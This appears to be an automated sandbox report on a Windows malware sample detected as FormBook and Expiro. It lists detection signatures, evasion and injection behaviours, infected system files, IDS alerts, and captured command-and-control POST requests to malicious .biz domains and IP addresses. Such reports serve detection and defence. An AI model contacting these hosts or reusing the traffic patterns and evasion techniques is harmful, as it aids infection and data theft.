Edit tour

Windows Analysis Report
I3LPkQh2an.exe

Overview

General Information

Sample name:	I3LPkQh2an.exe renamed because original name is a hash value
Original sample name:	f9d78174d15fee469beb09ad3a07fb4a87333cd00477b8dc934568edcb959738.exe
Analysis ID:	1588101
MD5:	b277e18dd8f1c8cc1908e58b16db405c
SHA1:	b64ecf7d0cf0433d9c919acbf320b421de1a5cf3
SHA256:	f9d78174d15fee469beb09ad3a07fb4a87333cd00477b8dc934568edcb959738
Tags:	exeWormm0yvuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Contains functionality to behave differently if execute on a Russian/Kazak computer

Creates files in the system32 config directory

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Writes to foreign memory regions

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Uncommon Svchost Parent Process

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

I3LPkQh2an.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\I3LPkQh2an.exe" MD5: B277E18DD8F1C8CC1908E58B16DB405C)

svchost.exe (PID: 7868 cmdline: "C:\Users\user\Desktop\I3LPkQh2an.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

armsvc.exe (PID: 7700 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: FD31927032749FC47370737BE446DF49)

alg.exe (PID: 7720 cmdline: C:\Windows\System32\alg.exe MD5: 09DAC14A3F12ABA6BB239CCFA7799AD0)

AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)

AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)

AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)

AppVClient.exe (PID: 7796 cmdline: C:\Windows\system32\AppVClient.exe MD5: 0FBD336D4561FB58CC24C965F9B57A79)

elevation_service.exe (PID: 7896 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: A19ADA9B1BCFFDFE7612B776B7EB43DA)

maintenanceservice.exe (PID: 7940 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 299377D30369966F4E6BFFFE968F16D3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.1738864587.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.1740236285.0000000003690000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\I3LPkQh2an.exe", CommandLine: "C:\Users\user\Desktop\I3LPkQh2an.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\I3LPkQh2an.exe", ParentImage: C:\Users\user\Desktop\I3LPkQh2an.exe, ParentProcessId: 7632, ParentProcessName: I3LPkQh2an.exe, ProcessCommandLine: "C:\Users\user\Desktop\I3LPkQh2an.exe", ProcessId: 7868, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\I3LPkQh2an.exe", CommandLine: "C:\Users\user\Desktop\I3LPkQh2an.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\I3LPkQh2an.exe", ParentImage: C:\Users\user\Desktop\I3LPkQh2an.exe, ParentProcessId: 7632, ParentProcessName: I3LPkQh2an.exe, ProcessCommandLine: "C:\Users\user\Desktop\I3LPkQh2an.exe", ProcessId: 7868, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:24:25.594354+0100	2051649	1	A Network Trojan was detected	192.168.2.7	65251	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:24:23.316285+0100	2051648	1	A Network Trojan was detected	192.168.2.7	60958	1.1.1.1	53	UDP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:24:19.811403+0100	2018141	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.7	49751	TCP
2025-01-10T21:24:23.207715+0100	2018141	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.7	49775	TCP
2025-01-10T21:24:27.040825+0100	2018141	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.7	49795	TCP
2025-01-10T21:25:00.871608+0100	2018141	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.7	49990	TCP
2025-01-10T21:25:08.131113+0100	2018141	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.7	49996	TCP
2025-01-10T21:25:11.418124+0100	2018141	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.7	49999	TCP
2025-01-10T21:25:14.219487+0100	2018141	1	A Network Trojan was detected	35.164.78.200	80	192.168.2.7	50003	TCP
2025-01-10T21:25:14.750567+0100	2018141	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.7	50004	TCP
2025-01-10T21:25:29.432881+0100	2018141	1	A Network Trojan was detected	18.246.231.120	80	192.168.2.7	50016	TCP
2025-01-10T21:25:30.041296+0100	2018141	1	A Network Trojan was detected	34.227.7.138	80	192.168.2.7	50017	TCP
2025-01-10T21:26:03.847123+0100	2018141	1	A Network Trojan was detected	3.254.94.185	80	192.168.2.7	50029	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:24:19.811403+0100	2037771	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.7	49751	TCP
2025-01-10T21:24:23.207715+0100	2037771	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.7	49775	TCP
2025-01-10T21:24:27.040825+0100	2037771	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.7	49795	TCP
2025-01-10T21:25:00.871608+0100	2037771	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.7	49990	TCP
2025-01-10T21:25:08.131113+0100	2037771	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.7	49996	TCP
2025-01-10T21:25:11.418124+0100	2037771	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.7	49999	TCP
2025-01-10T21:25:14.219487+0100	2037771	1	A Network Trojan was detected	35.164.78.200	80	192.168.2.7	50003	TCP
2025-01-10T21:25:14.750567+0100	2037771	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.7	50004	TCP
2025-01-10T21:25:29.432881+0100	2037771	1	A Network Trojan was detected	18.246.231.120	80	192.168.2.7	50016	TCP
2025-01-10T21:25:30.041296+0100	2037771	1	A Network Trojan was detected	34.227.7.138	80	192.168.2.7	50017	TCP
2025-01-10T21:26:03.847123+0100	2037771	1	A Network Trojan was detected	3.254.94.185	80	192.168.2.7	50029	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:24:19.651050+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.7	49750	54.244.188.177	80	TCP
2025-01-10T21:25:24.640330+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.7	50011	18.141.10.107	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: I3LPkQh2an.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://54.244.188.177/w	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/H	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/wbjqiahuptwvbQ(	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/w)	Avira URL Cloud: Label: malware
Source: http://54.244.188.177:80/wbjqiahuptwvb	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/O	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/z	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/q	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/	Avira URL Cloud: Label: malware
Source: http://54.244.188.177/wbjqiahuptwvb	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\AppVClient.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\FXSSVC.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\alg.exe	Avira: detection malicious, Label: W32/Infector.Gen

Multi AV Scanner detection for submitted file

Source: I3LPkQh2an.exe	ReversingLabs: Detection: 86%
Source: I3LPkQh2an.exe	Virustotal: Detection: 75%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1738864587.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1740236285.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\AppVClient.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\FXSSVC.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\alg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: I3LPkQh2an.exe

Joe Sandbox ML: detected

Source: I3LPkQh2an.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: I3LPkQh2an.exe, 00000000.00000003.1361170036.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: I3LPkQh2an.exe, 00000000.00000003.1387635055.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source:	Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
Source:	Binary string: ALG.pdbGCTL source: I3LPkQh2an.exe, 00000000.00000003.1365282595.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source:	Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: I3LPkQh2an.exe, 00000000.00000003.1387635055.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source:	Binary string: FXSSVC.pdbGCTL source: I3LPkQh2an.exe, 00000000.00000003.1397863214.0000000004190000.00000004.00001000.00020000.00000000.sdmp, FXSSVC.exe.0.dr
Source:	Binary string: wntdll.pdbUGP source: I3LPkQh2an.exe, 00000000.00000003.1397960663.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000003.1398411296.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1699509643.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1697301207.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1740366789.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1740366789.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: I3LPkQh2an.exe, 00000000.00000003.1397960663.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000003.1398411296.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1699509643.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1697301207.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1740366789.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1740366789.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: FXSSVC.pdb source: I3LPkQh2an.exe, 00000000.00000003.1397863214.0000000004190000.00000004.00001000.00020000.00000000.sdmp, FXSSVC.exe.0.dr
Source:	Binary string: ALG.pdb source: I3LPkQh2an.exe, 00000000.00000003.1365282595.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:60958 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49750 -> 54.244.188.177:80
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:65251 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:50011 -> 18.141.10.107:80

Source: Joe Sandbox View	IP Address: 54.244.188.177 54.244.188.177
Source: Joe Sandbox View	IP Address: 18.141.10.107 18.141.10.107

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.7:49751
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.7:49751
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.7:49775
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.7:49775
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49795
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49795
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.7:49999
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.7:49999
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.7:50003
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.7:50003
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.7:49996
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.7:49996
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.7:49990
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.7:49990
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.7:50004
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.7:50004
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.7:50016
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.7:50029
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.7:50029
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.227.7.138:80 -> 192.168.2.7:50017
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.7:50016
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.227.7.138:80 -> 192.168.2.7:50017

Source: global traffic	HTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 810
Source: global traffic	HTTP traffic detected: POST /cle HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 810
Source: global traffic	HTTP traffic detected: POST /wbjqiahuptwvb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 810
Source: global traffic	HTTP traffic detected: POST /osbo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /mxe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /pajihutcfilntm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /voucowxceex HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /ycqjghy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /wfnlorhejqfnr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
